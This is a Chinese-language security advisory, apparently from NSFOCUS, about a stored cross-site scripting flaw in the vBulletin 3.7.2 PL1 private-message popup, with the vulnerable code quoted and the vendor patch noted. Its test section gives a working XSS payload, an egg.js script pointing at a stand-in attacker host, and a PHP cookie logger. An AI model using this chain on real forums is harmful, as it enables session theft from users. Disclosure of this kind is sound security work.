首页 -> 安全研究
安全研究
安全漏洞
vBulletin $newpm[title]参数跨站脚本漏洞
发布日期:2008-08-20
更新日期:2008-08-22
受影响系统:
VBulletin VBulletin 3.7.2 PL1不受影响系统:
VBulletin VBulletin 3.6.10 PL3
VBulletin VBulletin 3.7.2 PL2描述:
VBulletin VBulletin 3.6.10 PL4
BUGTRAQ ID: 30777
vBulletin是一款开放源代码的PHP论坛程序。
vBulletin论坛如果启用了Show New Private Message Notification Pop-Up选项的话,由于没有正确地过滤保密消息标题的输入便执行了存储,这可能导致注入任意HTML和脚本代码,并在浏览恶意数据时执行。
以下是有漏洞的代码段:
/-----------
<!--
// script to show new private message popup
if (confirm("You have a new private message.\n\nSender:
[SENDER_USERNAME]\nTitle: '[PRIVATE_MESSAGE_TITLE]'\n\nClick OK to view
it, or cancel to hide this prompt."))
{
// Output when OK is clicked
if (confirm("Open the message in a new window?\n\n(Press cancel to open
in the current window.)"))
{
var winobj =
window.open("private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]", "pmnew",
"statusbar=yes,menubar=yes,scrollbars=yes,toolbar=yes,location=yes,directories=yes,resizable=yes,top=50,left=50"); if (winobj == null)
{
alert("Unable to open a new browser window,\n This might be due to a
'popup blocker'");
}
}
else
{
window.location = "private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]";
}
}
// end pm popup script
//-->
- -----------/
之前在global.php文件中取消了对install/vbulletin-style.xml中$newpm[title]变量的过滤,仅执行了斜线转义:
/-----------
//
#############################################################################
// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo['pmpopup'] == 2 AND
$vbulletin->options['checknewpm'] AND $vbulletin->userinfo['userid'] AND
!defined('NOPMPOPUP'))
{
$userdm =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
$userdm->set_existing($vbulletin->userinfo);
$userdm->set('pmpopup', 1);
$userdm->save(true, 'pmpopup'); // 'pmpopup' tells db_update to issue a
shutdownquery of the same name
unset($userdm);
if (THIS_SCRIPT != 'private' AND THIS_SCRIPT != 'login')
{
$newpm = $db->query_first("
SELECT pm.pmid, title, fromusername
FROM " . TABLE_PREFIX . "pmtext AS pmtext
LEFT JOIN " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
WHERE pm.userid = " . $vbulletin->userinfo['userid'] . "
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1");
$newpm['username'] =
addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
$newpm['title'] = addslashes_js(unhtmlspecialchars($newpm['title'],
true), '"');
$shownewpm = true;
}
}
- -----------/
这允许跨站脚本攻击。
<*来源:Federico Muttis
链接:http://secunia.com/advisories/31552/
http://www.vbulletin.com/forum/showthread.php?t=282133
http://marc.info/?l=bugtraq&m=121933258013788&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
- --></script><script src="http:"//attacker/vbStealer/egg.js></script><!--
这里egg.js脚本为
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower
var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET","http://victim/vbStealer/logger.php",false);
XmlHttp.setRequestHeader("Host","attacker");
XmlHttp.send();
logger.php脚本文件为
<?
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
$all_cookies .= "$cookie_name=$cookie_value, ";
}
rtrim($all_cookies, ", ");
file_put_contents("iplog.txt", "COOKIES: ".$all_cookies."\n", FILE_APPEND);
?>
建议:
厂商补丁:
VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.vbulletin.com/
浏览次数:2827
严重程度:0(网友投票)
绿盟科技给您安全的保障